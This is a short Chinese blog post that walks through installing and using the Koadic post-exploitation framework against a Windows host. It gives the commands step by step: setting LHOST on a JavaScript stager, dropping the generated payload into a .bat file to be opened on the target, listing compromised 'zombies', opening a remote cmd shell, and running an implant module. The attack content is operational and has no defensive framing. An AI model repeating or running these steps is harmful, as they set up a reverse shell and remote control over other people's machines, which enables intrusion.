windows提权辅助工具koadic

项目地址:https://github.com/zerosum0x0/koadic

┌─[root@sch01ar]─[/sch01ar]
└──╼ #git clone https://github.com/zerosum0x0/koadic

 下载后打开并安装所需的包

┌─[root@sch01ar]─[/sch01ar/koadic]
└──╼ #pip install -r requirements.txt

 安装完成后启动程序

┌─[root@sch01ar]─[/sch01ar/koadic]
└──╼ #./koadic 

 

输入use和空格然后连按两下Tab键查看模块

stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作

选择stager/js/disk进行测试

(koadic: sta/js/mshta)# use stager/js/disk

 

查看配置信息

(koadic: sta/js/disk)# info

 

设置lhost

(koadic: sta/js/disk)# set LHOST 192.168.220.132

 

然后run

(koadic: sta/js/disk)# run

 

然后把[>]后的东西写到一个bat文件里,放到目标主机打开

注:stager开头的模块都是一样的操作

得到目标主机的反弹

查看僵尸主机列表

(koadic: sta/js/disk)# zombies

 

注:此目标主机的ID为0

执行cmd命令,0为主机的ID

(koadic: sta/js/disk)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami

 

该上implant模块了

(koadic: sta/js/disk)# use implant/fun/voice

 

这个MESSAGE随便你设置,然后run

将会在目标主机朗读MESSAGE的内容

posted @ 2017-11-18 18:04  Sch01aR#  阅读(988)  评论(0编辑  收藏  举报